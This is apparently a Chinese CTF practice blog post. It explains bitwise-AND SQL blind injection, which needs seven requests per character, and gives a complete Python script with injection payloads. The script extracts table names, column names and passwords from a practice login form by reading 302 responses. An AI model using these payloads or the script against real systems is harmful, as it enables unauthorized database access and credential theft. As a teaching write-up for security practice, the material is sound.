以往大部分 sql 盲注的爆破脚本大概都是通过遍历一串可打印字符来对比,猜解正确的字符值。昨天看到了一种通过与运算来猜解字符串的想法,每个字符值只要通过7次与运算,就能够确定,有点类似于二分法,对比单纯遍历的思想,效率显著提升。

详情可看此文章:
让你的SQL盲注快起来

与运算猜解脚本如下:

1
2
3
4
5
6
7
8
9
10
11
def compute_by_and(word):
for ele in word:
ele_b=get_character(ele)
print "Guess the value {}:{}".format(ele_b,chr(ele_b))
def get_character(char):
char_b=ord(char)
value=0
for i in range(7):
if char_b & (2**i):
value=value+(2**i)
return value

来一道ctf题练练手

链接:
http://111.230.11.183:44444/basic_skills/sql/sql3.php
python sql盲注脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#coding:utf-8
import requests
import urllib
url="http://111.230.11.183:44444/basic_skills/sql/sql3.php"
table_payload="a' or 1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))&{2} -- "
column_payload="a' or 1 and ascii(substr((select column_name from information_schema.columns where table_name='user' limit {0},1),{1},1))&{2} -- +"
flag_payload= "a' or 1 and ascii(substr((select password from user limit {0},1),{1},1))&{2} -- "
#pyaload中mysql注释符--,后面记得要有空格

headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "http://111.230.11.183:44444",
"Connection": "close",
"Referer": "http://111.230.11.183:44444/basic_skills/sql/sql3.php",
"Upgrade-Insecure-Requests": "1"
}

def get_information():
all_name="result:"# 所有
for i in range(15):
name=""#单一
for j in range(1,33):
value=0#ascii
for k in range(7):
#payload=table_payload.format(i,j,(2**k))
#payload=column_payload.format(i,j,(2**k))
payload=flag_payload.format(i,j,(2**k))
#payload=urllib.quote(payload)
#print payload
data={
"username": payload,
"password":"sdf"
}
rep=requests.post(url=url,headers=headers,data=data,allow_redirects=False)
if rep.status_code==302:
value=value+(2**k)
if value==0: #判断name的结尾
if name=="":
print all_name
return 1
all_name=all_name+" "+name
break
name=name+chr(value)
print name

if __name__=="__main__":
get_information()

参考文章:

让你的SQL盲注快起来